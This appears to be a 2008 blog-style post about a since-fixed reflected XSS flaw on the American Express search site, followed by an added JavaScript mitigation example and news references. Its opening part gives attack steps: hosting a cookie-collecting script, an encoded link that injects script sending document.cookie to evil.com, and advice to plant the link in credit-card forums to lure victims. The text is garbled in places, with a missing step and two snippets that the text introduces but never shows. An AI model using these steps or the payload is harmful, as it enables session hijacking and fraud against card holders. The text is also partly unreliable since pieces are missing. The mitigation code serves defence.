Here is a quick description of a cross-site scripting (XSS) exploit that was fixed today on the American Express website.
All you need to do is:
1) Set up a web server or register for a free web hosting service that supports any type of server-side script (Perl, PHP, ASP, etc.)
2) Create a script to save the stolen cookies into a file or database and put it online.
Where XXX is your code that does whatever you want it to do. If you want to steal the cookie, the code would then be something like:
So the link to use to lure people into sending their cookies would be something like: http://find.americanexpress.com/search?q=%22%3E%3Cscript%3Elocation.href=’http://evil.com/cookie.php?’%2Bdocument.cookie%3C/script%3E
4) Place this link into forums about American Express or credit cards (since there is a better chance that people using these forums are using the Amex website, and therefore have cookies…)
This XSS has now been fixed, after it started to go public. The person who found the bug had a particularly hard time convincing Amex about this security problem.
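The post does not describe how the flaw was fixed. As an added example, not taken from the original post or from American Express, here is the standard mitigation for a search query reflected into a page: encode at output and mark the session cookie HttpOnly. The function names, the input template and the sample value are assumptions.

```javascript
// Added example. Assumption: the search page reflected the q parameter
// inside a double-quoted HTML attribute, which is what a leading `">`
// in the query is meant to break out of.

// Encode the five characters that can change the HTML parsing context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// BEFORE (hypothetical template): raw concatenation lets `">` close the
// attribute and the tag, so whatever follows is parsed as markup.
function renderSearchBoxUnsafe(q) {
  return '<input type="text" name="q" value="' + q + '">';
}

// AFTER: the same template with output encoding applied at the sink.
function renderSearchBoxSafe(q) {
  return '<input type="text" name="q" value="' + escapeHtml(q) + '">';
}

// Defense in depth: HttpOnly hides the session cookie from document.cookie,
// so a script that does slip through cannot read it.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// True when the rendered HTML still contains a parseable <script> tag.
function containsLiveScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample input, shaped like the query string in the link above
// but carrying only a comment.
const sample = decodeURIComponent('%22%3E%3Cscript%3E/*probe*/%3C/script%3E');

console.log('unsafe:', renderSearchBoxUnsafe(sample));
console.log('safe:  ', renderSearchBoxSafe(sample));
console.log('cookie:', sessionCookieHeader('sid', 'constructed-session-id'));
```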
A video of the simple exploit is available at: http://holisticinfosec.org/video/online_finance/amex.html
“American Express web bug exposes card holders”, Dan Goodin, The Register, December 16, 2008, http://www.theregister.co.uk/2008/12/16/american_express_website_bug/ (accessed on December 17, 2008)
“Holistic Security”, Russ McRee, December 17, 2008, http://holisticinfosec.blogspot.com/2008/12/online-finance-flaw-american-express.html (accessed on December 17, 2008)